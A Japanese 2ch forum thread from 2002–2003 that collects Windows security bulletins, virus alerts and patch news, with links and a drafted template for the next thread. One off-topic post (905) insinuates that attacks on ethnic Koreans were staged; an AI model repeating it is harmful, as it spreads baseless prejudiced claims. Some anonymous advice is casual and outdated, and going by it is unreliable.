     ∧_∧∩ / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
    ( ´∀`)/<先生!こんなのがありました!
 _ / /   /   \___________
\⊂ノ ̄ ̄ ̄ ̄\
 ||\        \
 ||\|| ̄ ̄ ̄ ̄ ̄||
 ||  || ̄ ̄ ̄ ̄ ̄||
http://freeserver.kakiko.com/hiroyuki/
868窓板住人:02/12/16 10:31 ID:???
Windows WM_TIMER メッセージ処理の問題により、権限が昇格する (328310)
(MS02-071)

登録日 : 2002/12/12 更新日 : 2002/12/12
----------------------------------------------------------------
最新情報は次のサイトでご確認ください。
http://www.microsoft.com/japan/technet/security/bulletin/ms02-071.asp
----------------------------------------------------------------
概要 :このセキュリティ情報の対象となるユーザー :
Microsoft(R) Windows(R) NT 4.0、Windows 2000 および Windows XP
を使用しているお客様

脆弱性の影響 : 権限の昇格
最大深刻度 : 重要
推奨する対応策 : お客様はできる限り早期にこの修正プログラムを
適用して下さい。
影響を受けるソフトウェア :
・Microsoft Windows NT 4.0
・Microsoft Windows NT 4.0, Terminal Server Edition
・Microsoft Windows 2000
・Microsoft Windows XP
869窓板住人:02/12/16 10:33 ID:???
問題 : 技術的な説明 :
(略)
この脆弱性により、メッセージを出したプロセスはその高い権限で処理を実行
することができます。
(略)
この修正プログラムはこの脆弱性を解決するだけでなく、対話的なデスクトップ
を持つ、高い権限で実行されるいくつかのプロセスに変更を行います。これらの
すべてのプロセスには WM_TIMER の脆弱性が存在せず、攻撃者によりシステムで
権限を取得されることはありませんが、マイクロソフトはサービスをさらに
強固にするために修正プログラムにこれらの変更を含めました。

問題を緩和する要素 : (略)

深刻度 : 製品
Windows NT 4.0 重要
Windows NT 4.0, Terminal Server Edition 重要
Windows 2000 重要
Windows XP 重要
上記の評価はこの脆弱性の影響を受けるシステムの種類、システムの典型的な
展開形式およびこの脆弱性がシステムに及ぼす影響に基づいています。

脆弱性識別番号 : CAN-2002-1230
テストしたバージョン :
Windows NT 4.0、Windows NT 4.0、Terminal Server Edition、Windows 2000
および Windows XP。
それ以前のバージョンに関してはサポートの対象となっていないため、
この脆弱性による影響は不明です。
870窓板住人:02/12/16 10:33 ID:???
871窓板住人:02/12/16 10:35 ID:???
修正プログラムに関する追加情報 :
対象プラットフォーム :
・Windows NT 4.0 用の修正プログラムは、Service Pack 6a を実行している
システムにインストールすることができます。
・Windows NT 4.0 Terminal Server Edition 用の修正プログラムは、
Windows NT 4.0, Terminal Server Edition Service Pack 6 を実行している
システムにインストールすることができます。
・Windows 2000 用の修正プログラムは、Service Pack 1、Service Pack 2
または Service Pack 3 を実行しているシステムにインストールすることが
できます。
・Windows XP 用の修正プログラムは、Windows XP または Service Pack 1 を
実行しているシステムにインストールすることができます。
この修正を含む予定のサービス パック :
この問題に対する修正プログラムは Windows 2000 Service Pack 4 および
Windows XP Service Pack 2 に含まれる予定です。
再起動の必要性 : あり
修正プログラムのアンインストール : 可
修正プログラムに含まれる過去の修正 : なし
修正プログラムが正しくインストールされたかどうか確認する方法 :(略)
警告 :なし

詳細情報 :
・US マイクロソフトセキュリティ情報(MS02-071)
http://www.microsoft.com/technet/security/bulletin/ms02-071.asp

更新履歴 :・2002/12/12: このセキュリティ情報ページを公開しました。
872IEは危ない:02/12/16 13:32 ID:3phAxh0W
ウインドーズについてくるIEではユーザーが行ったサイトの情報がCookiesフオルダーの中にあるINDEXに記入されるようになっている(クッキーそのもの以外に)。そしてINDEXの内容を変更するとIEが動かなくなってしまうようにできている。

これはプライバシーや個人情報の点で非常に危険。

はやく、Mozilla や Netscape 等の別のブラウザーを使うようにしたほうがいい。
873名無しさん@お腹いっぱい。:02/12/16 14:01 ID:5XnoVsfP
お尋ね申します。
パソコンが変です。きちんと電源を落としたのに、
次に使う時、立ち上がりません。
IBMですが、「スタンバイ」のランプは付いているのですが・・
そして、夜中に、急にパスワードの画面が出るのです。
これって、何かのウイルスなのでしょうか?
874名無しさん@お腹いっぱい。:02/12/16 14:03 ID:0wB26P0R
>>872
MozillaやNetscapeではCookieを利用してパソコン内のファイル一覧が表示されるバグとか多かったよね。

ブラウザを選ぶのではなく、CookieとJavaは使わないようにしよう。
875むむむ ◆MUMUMUkopk :02/12/16 15:41 ID:???
4日ほど多忙留守ですた。窓板住人氏、乙様です。
今470KBなので900ぐらいまで行ったら新スレですかね。
876名無しさん@お腹いっぱい。:02/12/16 16:18 ID:???
もうそんな大きくなったか。
全て丸写しする必要ないかもしれませんね。
概要と説明へのリンクとファイルの直リンで十分かと。
そっちの方がめんどくさいかな?

でも著作権的にも丸写しってのはまずいだろうしね。
877名無しさん@お腹いっぱい。:02/12/16 17:23 ID:???
878名無しさん@お腹いっぱい。:02/12/16 18:08 ID:???
>>876 実はさ、MSからは、全文引用のみ可、部分引用、要約翻案禁止って
言われてるんだよね(^^;
879名無しさん@お腹いっぱい。:02/12/16 18:51 ID:???
何じゃそら、ワロタ
880サイトマニア:02/12/16 20:22 ID:Mljg6YWb
最近パソコン買いました。チャットにはまってます
http://www.his-chat.com/
881窓板住人:02/12/17 15:00 ID:???
>>875 どもっす。

ところで、>>768 のMS02-066ですが、また、新たにPNG関連の脆弱性が発見され、
脆弱性最大深刻度が緊急に格上げされています。このパッチはMS02-068に
包含されていますから、ユーザはMS02-068を早急に適用した方が良さそうです。

関連記事 ZDNN:MS、またも深刻度を過小評価
http://www.zdnet.co.jp/news/0212/14/nebt_13.html
----------------------------------------------------------------
最新情報は次のサイトでご確認ください。
http://www.microsoft.com/japan/technet/security/bulletin/ms02-066.asp
================================================================
今回の更新内容
このセキュリティ情報の深刻度を更新し、「PNG イメージ ファイル」 の脆弱性に
関する新しい追加情報を記載しました。最初にリリースされたセキュリティ情報で
提供された累積的な修正プログラムは、この脆弱性を修正します。

なお、このセキュリティ情報に関する累積的な修正プログラムは、マイクロソフト
セキュリティ情報 MS02-068 に既に含まれています。マイクロソフトはお客様に
最新である MS02-068 で提供されている累積的な修正プログラムを適用することを
強く推奨します。
http://www.microsoft.com/japan/technet/security/bulletin/ms02-068.asp
================================================================
(以下略)
882名無しさん@お腹いっぱい。:02/12/17 23:25 ID:sXibjpLi
Flash Playerにバッファ・オーバーフローのセキュリティ・ホール
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20021217/1/
883名無しさん@お腹いっぱい。:02/12/19 00:17 ID:???
>>882
要するに、Macromedia Flash playerのVer.6.0.65.0を
入れれば良いってこと?
884窓板住人:02/12/19 00:18 ID:???
>>883 そでない?
885窓板住人:02/12/19 00:58 ID:???
CERT/CC(カーネギメロン大コンピュータ緊急対応チーム/調整センター)
によれば、最近、445/TCPおよびNetBIOS 137、138番ポートにおける
スキャンが増加しており、特に445/TCPにおいてはW32/Liotenウイルスが
原因であるとの調査報告があるそうです。W32/Liotenに関してはトロイの木馬
ですから、Iraqi_oil.exe というファイルの存在に気を付けてください。
また、これらのポートは基本的にデフォルトでONですから、管理者は
ポートを塞ぐなどの対応をすることをお勧めします。

CERT/CC CurrentActivity
http://www.cert.org/current/current_activity.html#IraqiWorm
W32/Liotenの概要
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_LIOTEN.A
ITPro: スペシャルレポートWindowsに潜むデフォルト設定の落とし穴
http://itpro.nikkeibp.co.jp/members/NBY/techsquare/20021129/1/
@IT Windows TIPS : ポート445(ダイレクト・ホスティングSMBサービス)に注意
http://www.atmarkit.co.jp/fwin2k/win2ktips/088directhostedsmb/088directhostedsmb.html
@IT Windows 2000 TIPS : Knowledge:インターネット常時接続時の基本セキュリティ設定
http://www.atmarkit.co.jp/fwin2k/win2ktips/120rrassec/120rrassec_01.html
886窓板住人:02/12/19 01:00 ID:???
887窓板住人:02/12/19 03:24 ID:???
コンピューターウイルスが合体、「破壊+感染力」で被害拡大
http://b2o.nikkei.co.jp/contents/news10/evening/20021217d1g0603817.cfm
888名無しさん@お腹いっぱい。:02/12/19 12:40 ID:MGfYIhAh
889名無しさん@お腹いっぱい。:02/12/19 17:12 ID:???
age
890210.239.43.212.in-addr.arpa:02/12/19 19:12 ID:H4uyRyiT
regst
891名無しさん@お腹いっぱい。:02/12/20 00:13 ID:???
>888
【M$】Windows XPに最高レベルのセキュリティホール
http://news2.2ch.net/test/read.cgi/newsplus/1040309563/
892窓板住人:02/12/20 01:17 ID:???
次スレのテンプレ作ってみたんですが、長くなりすぎたので(^^;
採用は自由、改変も自由と言うことで。
-----
☆とにかくPCは適切な設定とこまめなアップデートが肝心。
★初心者・家庭向け★
マイクロソフト製品をより安心してご利用いただくためのホームユーザ向けセキュリティ対策早わかりガイド
http://www.microsoft.com/japan/enable/products/security/default.asp
Microsoft セキュリティスクエア
http://www.microsoft.com/japan/security/square/

★アップデート入手先★
Windows Update
http://windowsupdate.microsoft.com
Office Update
http://office.microsoft.com/japan/ProductUpdates/default.aspx
Microsoftダウンロードセンター
http://www.microsoft.com/downloads/search.aspx?langid=13&displaylang=ja

★適切な設定ガイド・確認サイト★
IT Pro技術の広場:スペシャルレポート Windowsに潜むデフォルト設定の落とし穴
http://itpro.nikkeibp.co.jp/members/NBY/techsquare/20021129/1/
ぷらら[フレッツ・ADSLセキュリティ対策について]
http://mpw2.plala.or.jp/faq/setsuzoku/internet_setsuzoku/setuzoku_flets-a/security.html
パーソナルセキュリティ研究所
http://210.143.99.143/~p-sec/
893窓板住人:02/12/20 01:17 ID:???

★情報源(定番ニュースサイトは除く)★
Microsoft Technet Security Center
http://www.microsoft.com/japan/technet/security/default.asp
Technet ウイルス対策情報
http://www.microsoft.com/japan/technet/security/virus/default.asp
セキュリティ センター : トピック
http://www.microsoft.com/japan/technet/security/topics/default.asp
IPA セキュリティセンター
http://www.ipa.go.jp/security/
セキュリティホールmemo(とその先のリンク)
http://www.st.ryukoku.ac.jp/~kjm/security/memo/

★管理者向け★
Technet セキュリティ ツール
http://www.microsoft.com/japan/technet/security/tools/tools.asp
Windows NTを用いた高度セキュリティシステム構築技術調査
http://www.ipa.go.jp/security/fy10/contents/crack/research/windowsnt/windowsnt.html
Windows 2000を用いた高度セキュリティシステム構築技術調査
http://www.ipa.go.jp/security/fy10/contents/crack/research/windows2k/default.htm
894名無しさん@お腹いっぱい。:02/12/20 03:21 ID:mhKisRS+
はぁ
895名無しさん@お腹いっぱい。:02/12/20 09:18 ID:???
(一年前のイブの感動(騒動)が再び甦る)
【クリスマスイブの吉野家全国同時注文祭】
・内容
参加表明店舗の指定時刻に入店
大盛りネギだくぎょくを注文
私語・雑談禁止 殺伐と食し 速攻で代金を払い出る
【日時】12月24日の各地域指定時間
【場所】全国の吉野家
現本部スレ(祭板)
02/12/24開催 吉野屋同日注文祭
http://live.2ch.net/test/read.cgi/festival/1039512445/l50
参加店舗確認http://koisuri.hp.infoseek.co.jp/off.html
過去レポート(初心者必読)http://www2.mnx.jp/carvancle/yoshigyu/
祭のFAQhttp://kakutenpo.tripod.co.jp/faq.html
896名無しさん@お腹いっぱい。:02/12/20 12:36 ID:???
>>892-893
(・∀・)イイ!!
897むむむ ◆MUMUMUkopk :02/12/20 13:01 ID:???
>>892-893
いいすね。で、どこに立てますかね。
ここでいいのかな。
898窓板住人:02/12/20 13:42 ID:???
>>896-897 そういっていただけると(^o^)
場所はPCニュース板としての価値を維持するために
ここでいいんじゃないかと(^^;

あ、あと、前スレのリンクお忘れ無く(俺が忘れてた(^^;)
899名無しさん@お腹いっぱい。:02/12/20 14:11 ID:???
板のためのスレ
900名無しさん@お腹いっぱい。:02/12/20 18:30 ID:???
>窓板住人さん
乙。うまくテンプレまとまってますね。

>むむむ ◆MUMUMUkopk さん
いつもお疲れさんです。
901窓板住人:02/12/20 23:03 ID:???
>>900 どもっす。

年末警報 −添付ファイルにご用心− −メールを選択しただけでも感染!!−
2002年12月18日 情報処理振興事業協会 セキュリティセンター(IPA/ISEC)
http://www.ipa.go.jp/security/topics/alert141218.html
902これは?:02/12/21 21:56 ID:kn1BbrEF
Win XPにまたもや危険なホール,マウスカーソル重ねるだけでウイルスに感染

http://itpro.nikkeibp.co.jp/free/NBY/NEWS/20021220/1/
903名無しさん@お腹いっぱい。:02/12/21 23:12 ID:???
>>902
>>891の奴かな
904yumi:02/12/21 23:18 ID:???
905名無しさん@お腹いっぱい。:02/12/22 00:18 ID:yOZgI0EG
・チマチョゴリ切り裂き事件
犯人が速攻で取り押さえられても不思議ではない事件。犯人は?
そもそも衣服が切られたのに怪我人がいない。
ルパンの石川五右衛門ですか?
・嫌がらせ事件
逮捕者に日本人がいないそうです、何故でしょう?
・落書き事件
朝鮮総連に「めぐみさんを反せ」と落書きされた
ハングルでは反と返は同じ表現ですが関係あるのでしょうか?
・朝鮮総連放火事件
なぜかタオル1枚が燃え尽きる前にお偉いさんが見つけました、
通行人は110に通報しました。
火が付いてから5分で発見したそうなのですが、何故5分と解るのでしょうか?
しかも、「善良な日本人」を名乗る犯行声明がありました。
906窓板住人:02/12/23 12:24 ID:???
結構前だけど
http://www.foundstone.com/knowledge/randd-advisories.html
Multiple Exploitable Buffer Overflows in Winamp
One buffer overflow exists in Winamp 2.81 (latest 2.x release) and
two buffer overflows exist in Winamp 3.0 (latest 3.x release).

Winamp 2.81 および 3.0 に buffer overflow する弱点。
MP3 ファイルの ID3v2 タグ (Winamp 2.81: Artist フィールド、
Winamp 3.0: Artist および Album フィールド) の取りあつかいで
buffer overflow するため、Winamp 2.81 はクラッシュ、Winamp 3.0 では
任意のコードの実行が可能。 (セキュリティホールmemoより抜粋)

だそうで、http://www.winamp.com/news.jhtml?articleid=9680 によれば
If you haven't downloaded Winamp since 12-17-2002
then you are vulnerable to the security exploit.
2.81だろうが3.0だろうがとにかく最新のをダウンロードすれば良いらしいです。
907むむむ ◆MUMUMUkopk :02/12/24 11:47 ID:???
>>906
某memo MLで話題になってたやつですね。
バージョン等を変えずにファイルだけ差し替えたみたいです。
908むむむ ◆MUMUMUkopk :02/12/24 11:53 ID:0Lvjy+9m
■Muliple Buffer overruns RealNetworks Helix Universal Server 9.0

RealNetworks の Helix Universal Server にバッファオーバーフローの脆弱性。

情報元: http://archives.neohapsis.com/archives/vulnwatch/2002-q4/0121.html
FIXの入手先: http://www.service.real.com/help/faq/security/bufferoverrun12192002.html
909名無しさん@お腹いっぱい。:02/12/29 19:47 ID:HmFwaMNP
保守
910名無しさん@お腹いっぱい。:02/12/29 23:00 ID:JcZqEPE3
もう、



windowsなんて




つかわないから




かんけいないもーん。
911名無しさん@お腹いっぱい。:02/12/30 00:32 ID:???
あっそ
912名無しさん@お腹いっぱい。:02/12/31 17:59 ID:uP6QWOMK
913名無しさん@お腹いっぱい。:03/01/01 04:24 ID:???
むむむさん、窓板住人さん、名無しさん多数…
あけましておめでとうございます
914名無しさん@お腹いっぱい。:03/01/02 07:08 ID:JqDZ6Vem
保守
915名無しさん@お腹いっぱい。:03/01/02 23:30 ID:arAsotse
Microsoft Data Access Components (MDAC) 2.71 Service Pack 1
http://www.microsoft.com/downloads/details.aspx?displaylang=ja&FamilyID=9ad000f2-cae7-493d-b0f3-ae36c570ade8

MDAC 2.7 SP1 の再配布可能インストーラーは、Microsoft Windows XP SP1 と同じ Data Access コア コンポーネントをインストールします。
このリリースには、Microsoft Jet、Microsoft Jet OLE DB Provider、Desktop Database Drivers ODBC Driver、Visual FoxPro ODBC Driver は含まれていません。
916名無しさん@お腹いっぱい。:03/01/02 23:31 ID:arAsotse
システム要件
サポートされているオペレーティング システム : Windows 2000, Windows 98, Windows ME, Windows NT, Windows XP

Microsoft Windows 98 (Y2K Update 2 が必要) および Internet Explorer 4.01 Service Pack 2 (SP2) 以降
Microsoft Windows 98 Second Edition
Microsoft Windows Millennium
Microsoft Windows NTR 4 Service Pack 5 (以上) および Internet Explorer 4.01 SP2 以降
Microsoft Windows 2000
Microsoft Windows XP
917窓板住人:03/01/05 00:20 ID:???
>>913 おおおーありがとうございますー。
>>915 おお、なに修正されたんだろー
918窓板住人:03/01/05 00:21 ID:???
というか、明けましておめでとうございますだった(笑)
919名無しさん@お腹いっぱい。:03/01/05 01:56 ID:???
この板、なにげにチェックしていますが、けっこうお世話になってます。

ところで、むむむさんに質問です。
トリップは偶然MUMUMUとなったのですか、それとも自分の好きなのを出す裏技があるのでしょうか?
よろしかったら教えてください。

920窓板住人:03/01/05 02:19 ID:???
>>919
窓板住人でごめんw
むむむさんも多分こういうの使って探したんだと思うよ?
http://tripsage.hp.infoseek.co.jp/
921919:03/01/05 15:50 ID:???
>>窓板住人さん
いえいえ、ありがとうございます。
早速ダウンロードさせていただきました。
922915:03/01/05 23:14 ID:uxuxlJDs
MDAC2.7のmsxml3.dllのバージョンがMS02-008のそれより古い問題がありましたが
sp1では解決されてます。
よって、MDAC2.7sp1をインストールすれば
MS02-008をその後にインストール必要はないようです。

気になったので調べてみました。
923窓板住人:03/01/06 01:36 ID:???
>>922 おおおおお、それはもの凄い良い話でイイ情報だ!THX!
924山崎渉:03/01/06 01:58 ID:???
(^^)
925名無しさん@お腹いっぱい。:03/01/06 02:19 ID:???
>>850
最近シャットダウンにやたら時間かかると思ったらこれが原因だったか。
アンインスコしたらスムーズに終了できるようになった。
個人使用のPCならあんまり意味無いから削除した方がいい。
926名無しさん@お腹いっぱい。:03/01/06 10:58 ID:vW7YJAeD
保守
927名無しさん@お腹いっぱい。:03/01/06 11:41 ID:StxhOpi/
l;:
928窓板住人:03/01/07 15:52 ID:???
どもー。某所からの情報ですが、

Word フィールドおよび Excel の外部データ更新の問題により、
情報が漏えいされる (Q330008) (MS02-059)
http://www.microsoft.com/japan/japan/technet/security/bulletin/MS02-059.asp

Word97/98用Patchがでてますー。

なんか良く分かんないけど、
「Word 97/98 を使用しているコンピュータは、セキュリティ情報 MS02-059
に記載されているセキュリティの問題に対して脆弱である場合がある」
そうで。

さらになんかよくわかんないのですが、KBにはメールで申し込まないとダメみたいな
書き方してますけど、ちゃんとダウンロードできるみたいで。
929窓板住人:03/01/07 15:54 ID:rN7Ja3Bt
あ、ageますー。
ついでにKBのリンクですー。
マイクロソフト サポート技術情報 - 330080
[WD97] Word 97 に存在する MS02-059 のセキュリティ問題
http://support.microsoft.com/default.aspx?scid=kb;ja;330080

タイトルはWord97しか書いてないけどWord98も書いてありますですー。
930名無しさん@お腹いっぱい。:03/01/07 17:46 ID:cfjBnhmZ
Yaha.Kに関する情報は無いですか??
931あぼーん:あぼーん
あぼーん
932名無しさん@お腹いっぱい。:03/01/07 18:28 ID:???
【新事実】愛生会病院のWeb site作者は有名クリエーター
http://pc.2ch.net/test/read.cgi/sec/1017309416/l50

匿名掲示板で話題になった愛生会病院(埼玉県久喜市:宮本弘毅院長)
のサイトだが、実は有名なWebクリエーターの作品であることが4日、分かった。
このサイトを作成したのはTVタイトル、ロゴ等何でもこなす、埼玉県在住のF氏。
デザインのみならず企画力も抜群で、今回のコンセプトは、とにかくWeb作成上の
禁じ手を可能な限り詰め込むこととした。
実際に愛生会のサイトへアクセスすると、「太陽にほえろ」の軽快なBGMの流れる中、
黒背景に原色を多用した文字配列、どぎついまでのアニメーションGIFなど、見る側に
かなりのインパクトを与えることは間違いない。
F氏は、既成の病院のイメージを打ち崩し、みんなの心に残るサイトを創りたかったと話す。
その言葉を反映するかのように、アクセス件数は一日数万件を数え、病院のサイトでは
間違いなくアクセス件数No.1だろう。(日系ウエブデザイン)
933むむむ ◆MUMUMUkopk :03/01/08 21:17 ID:???
>>913
あけおめことよろ。

>>919
はい、>>920 を使いますた。偶然で出すのは神業かと。
934むむむ ◆MUMUMUkopk :03/01/08 21:19 ID:???
■複数の感染経路を持つ「最強最悪」のウイルス「LIRVA」

 トレンドマイクロは8日、メール、ICQ、LAN、ファイル共有ソフトなど複数の感染経路を
持つ“最強最悪”のウイルス「WORM_LIRVA.A」を警告した。1月8日18時の段階で日本
での感染報告はないものの、フランスでは10件の感染が報告されている。現在のところ
危険度「低」だが、感染力の高さから予断を許さない状況だ。

 「WORM_LIRVA.A」は、1月7日に発見されたトロイの木馬型ウイルスで、複数の感染
経路や破壊活動等を行なう。主な活動を挙げると、「自分自身のコピーを作成」、
「独自のSMTPによる自分自身の大量送信」、「ネットワークドライブへの感染」、
「パスワード漏えい」、「アンチウイルスソフトの停止」などとなっている。
(以上、2003年1月8日のBroadband Watchより一部引用―全文は引用元を参照)

引用元: http://bb.watch.impress.co.jp/cda/news/432.html
935窓板住人:03/01/10 15:42 ID:fZOFsqKV
>>934
LIRVAの危険度が「中」に格上げになってます。
ご注意下さい。
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_LIRVA.C
936窓板住人:03/01/11 21:49 ID:???
MPSB03-01 - Patch available for ColdFusion MX Enterprise Edition
sandbox security issue that allows templates to include arbitrary files
http://www.macromedia.com/v1/handlers/index.cfm?ID=23638

Macromedia Cold Fusion MXに弱点。
<cfinclude>タグと<cfmodule>タグにおいて、相対パスでファイル名を指定することが出来るが、
SandBoxSecurity Files/Dirs permissionsの指定で本来は指定を制限できるのに機能していない?
ということらしいです。パッチ当ててください。
937窓板住人:03/01/13 06:33 ID:???
一応、Windowsで動くしセキュリティがらみということで。

Windowsで動作するWWWサーバ、an httpdがバージョンアップしてます。

Version 1.42e では、特定のURIでクロスサイトスクリプティングが発生する
セキュリティバグに対処しました。また、デバイス名チェックを強化しました。
(2003/1/8)
Version 1.42f では、1.42e で CGIが正常に動作しないバグを修正しました。
(2003/1/9)

新しいバージョンは公式サイトからダウンロードしてください。
http://www.st.rim.or.jp/~nakata/
938窓板住人:03/01/14 21:13 ID:VPWXHMzL
Sobigというウイルスがはやりだしたようです。
ご注意下さい。
大量メール送信機能を有しています。
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_SOBIG.A
http://www.nai.com/japan/virusinfo/virS.asp?v=W32/Sobig@MM
http://www.cert.org/current/current_activity.html#W32Sobig
939あぼーん:あぼーん
あぼーん
940窓板住人:03/01/15 04:37 ID:9loGVVQz
OpenTypeフォントファイルがWindows 2000とXPをクラッシュ
http://headlines.yahoo.co.jp/hl?a=20030108-00000016-vgb-sci

アイ・ディフェンス・ジャパンからの情報によると、マイクロソフト社の
Windowsフォントローダーで、サービス拒否(DoS)攻撃の脆弱性が
発見された。
この欠陥をローカル攻撃することで、システムがクラッシュする。
Windows 2000およびXPでは、即時に青一色のエラー画面
(ブルースクリーン)が表示される(以降略)

ご注意下さい。IEとかにはフォントをロードする機能もあったはずですし。
(これに関する影響は不明ですが)
941山崎渉:03/01/15 12:14 ID:???
(^^)
942名無しさん@お腹いっぱい。:03/01/15 17:21 ID:???
Vine入れておけ。
http://vinelinux.org/
943名無しさん@お腹いっぱい。:03/01/15 19:07 ID:???
Windows XP SP1導入後、ネットワークファイルエラーが発生する問題を発表
http://internet.watch.impress.co.jp/www/article/2003/0115/winxp.htm

既出か?
944窓板住人:03/01/15 21:32 ID:???
>>943 Windows板で既出で、そのパッチ当てるとシャットダウンが遅くなると言う事象も
これまた既出だけど、それはセキュリティとはあまり関係ないような・・・
945名無しさん@お腹いっぱい。:03/01/15 22:46 ID:???
つまり、マイクソは糞という訳で
946山崎渉:03/01/16 06:29 ID:???
(^^)
947窓板住人:03/01/16 13:18 ID:???
>>943 のトラブルの件ですが、セキュリティホールmemoに詳しい事情が
ありますのでリンクしておきます
http://www.st.ryukoku.ac.jp/~kjm/security/memo/2003/01.html#20030116_smb
■ Windows XP SP1導入後、ネットワークファイルエラーが発生する問題を発表
(INTERNET Watch, 2003.01.15)
948名無しさん@お腹いっぱい。:03/01/16 17:54 ID:W3fs+2Tq
保守
949窓板住人 ◆winDOwS0aE :03/01/17 22:23 ID:3Jhh5d5I
マイクロソフト サポート技術情報 - 331663
Windows Update Web サイトおよび自動更新機能により MS02-052 ではなく
MS02-013 のインストールを求めるプロンプトが表示される
http://support.microsoft.com/default.aspx?scid=kb;ja;331663

よくわからないのですが、MS02-013を適用後、SunのJREをインストールすると、
MicrosoftVMのレジストリ値が書き換えられるためにMS02-013が未適用と識別され、
本来適用しないとまずいMS02-053がWindows Updateのリストや自動更新に含まれない
という問題があるようです。。。一応セキュリティホールがらみなので、念のため。
950むむむ ◆MUMUMUkopk :03/01/20 03:08 ID:???
■各社のJava VMに砂場の枠が外れる脆弱性

jbeef曰く、"11月25日にBUGTRAQに流れた記事によると、ポーランドのグループが、
Netscape、Microsoft、SunのそれぞれのJava VMに、 bytecode verifierのチェック
漏れやJITコンパイラのバグなどが原因のセキュリティホールを発見したという。
Netscape 4.0〜4.8(Windows, Unix版)と Internet Explorer 4.0〜6.0では、 sandbox
セキュリティ制約が崩れ、その結果、ローカルファイルの読み出しや、任意コマンドの
ローカル実行などの脅威がもたらされる。 Netscape 4.xでは、JDBC関連のシステム
クラスの実装ミスもあり、合わせ技によって、任意のネイティブコードの実行もできて
しまうという。
(以上、2003年1月20日のSlashdot Japanより一部引用―全文は引用元を参照)

引用元: http://slashdot.jp/article.pl?sid=03/01/19/107215&topic=43
951窓板住人 ◆winDOwS0aE :03/01/20 03:59 ID:tKHjC5kf
一応、Javaerなので、>>950 に補足を。

この穴がふさがったJREは次の通りにすでにリリースされているため、
Sunは問題を黙認してたことになります。
1.4.1_01以降 2002.10.16頃リリース済み 1.4.0_03以降 2002.11.15頃リリース済み
1.3.1_06以降 2002.10.22頃リリース済み 1.2.2_014以降2002.10.31頃リリース済み
情報源は http://www.gimlay.org/~andoh/java/arc/javaold-index.html です。

日本で有名なJava-house.jpにあなたがお使いのJavaのバージョンを調べるページが
ありますので参考まで(複数あるのはタグによって挙動が異なるためです)。
http://java-house.jp/~takagi/java/security/show-version/test.html
952名無しさん@お腹いっぱい。:03/01/20 05:25 ID:2lw8fjSO
Javaはきってる
953あぼーん:あぼーん
あぼーん
954あぼーん:あぼーん
あぼーん
955窓板住人 ◆winDOwS0aE :03/01/20 10:57 ID:tKHjC5kf
★IEのXSSバグで任意サイトのCookieが漏洩

jbeef曰く、"現時点でIEはcookieを盗まれ得るブラウザである。
cookieを盗まれると致命傷となるサイトの利用には注意が必要だ。
12月に2つのcookieが漏洩する脆弱性が報告されたが、まだパッチが出ていない。
1つ目の脆弱性は、JScriptの「showModalDialog()」メソッドにあり、
任意のWebサイトのcookieが盗まれ得る。
2つ目の脆弱性は、ウィンドウで直接「.swf」などのファイルを開く機能にある。
IEは、フラッシュなどのファイルを直接開くとき、それを貼り付けたHTMLを
内部的に生成しているのだという。
このHTMLの生成過程に、クロスサイトスクリプティング(XSS)脆弱性がある・・・(略)

詳しくは引用先Slashdot Japanをご覧下さい
http://slashdot.jp/security/03/01/18/1226227.shtml?topic=41

XSSの問題は非常にアレゲな感じ。Flash作者なら簡単にできそう。
しばらくは安易にFlashは見れなくなりそう。
956名無しさん@お腹いっぱい。:03/01/20 13:24 ID:???
おまんこ
957名無しのエンドうざー:03/01/20 21:11 ID:???
>949
>950の件でJ2RE1.4.1_01を入れたのですが、
レジストリに書き込まれているバージョンは確かに3802になりましたが、
WindowsUpdateでJavaVMのインストール要求は出ませんでした。

Win95OSR2+IE5.5SP2
JREインストール前のバージョン : 3809

以上、参考まで。
958窓板住人 ◆winDOwS0aE :03/01/21 06:17 ID:???
■IEのCookieをオフにしても有効なCookieモドキ
最近はCookieによるプライバシー侵害問題がクローズアップされ、
IE6にはP3PというCookie制限機能などもあり、適切なプライバシー管理が
クローズアップされていますが、IEにはP3Pの趣旨を覆すような
クライアントサイドに永久にクライアントを個別に認識可能なIDなどのデータを保持する
いわばSuperCookieと呼ばれる機能がまだ2つほど備わって居るんだそうです。

1つめはすでに有名なWindowsMediaPlayerが送信するGUIDで、
これをJavaScriptから参照可能であるという問題があるそうです。
2つめに、IEにはUserDataの常設という機能があり、Webサイトが個別に
永遠に保持可能なCookie(のようなもの)をIEに設定させることが出来るとか。
詳しくは引用元Slashdot Japan http://slashdot.jp/article.pl?sid=03/01/19/2134203
をご覧下さい。

なお、ここからは独自の情報ですが、Macromedia Flashにもクライアントを
個別識別可能なSuperCookieもどきが存在します。
さらにFlashで自動的にクライアントマシンのカメラを使用可能にしたり
出来る設定も存在します。
全てのサイトの共通のプライバシー設定はSettingManagerから行えるようです。
http://www.macromedia.com/jp/support/flashplayer/help/settings/
サイト個別の設定はそのFlashをブラウザで表示した状態で、右クリック-設定
を行います。 http://www.macromedia.com/jp/support/flashplayer/help/
プライバシーの気になる方はチェックした方が良いかもしれません。
959名無しさん@お腹いっぱい。:03/01/21 14:33 ID:5YtnqncI
新スレは?
960窓板住人 ◆winDOwS0aE :03/01/21 16:09 ID:???
>>959 むむむさん忙しそうだから建てちゃおうかな。
961窓板住人 ◆winDOwS0aE :03/01/21 16:37 ID:???
【Windows】セキュリティ情報総合スレッド 2
http://pc.2ch.net/test/read.cgi/pcnews/1043134572/l50
962窓板住人 ◆winDOwS0aE :03/01/21 16:40 ID:???
どうでもいいけど、かちゅ〜しゃで●ログインしてもプロキシ刺しても
さんざんスレ建てれなかったのにブラウザでやったら一発で建てれるってどういう事よ、、、

【Windows】セキュリティ情報総合スレッド 2
http://pc.2ch.net/test/read.cgi/pcnews/1043134572/l50
963名無しさん@お腹いっぱい。:03/01/21 16:47 ID:???
>>962
おつ!
964名無しさん@お腹いっぱい。:03/01/21 17:53 ID:???
レス数が950を超えています。1000を超えると表示できなくなるよ。
サイズが496KBを超えています。512KBを超えると表示できなくなるよ。

これが、2つ同時に表示されるの初めて見た・・・

965名無しさん@お腹いっぱい。:03/01/21 19:34 ID:???
>964 新しいスレには、どうでもいい事を書かないように頼むよ
966窓板住人 ◆winDOwS0aE :03/01/23 12:30 ID:???
>>964 数回見たことあるけどなぁ
>>965 まぁまぁ、マターリ行きましょ

といいつつ埋めてみる
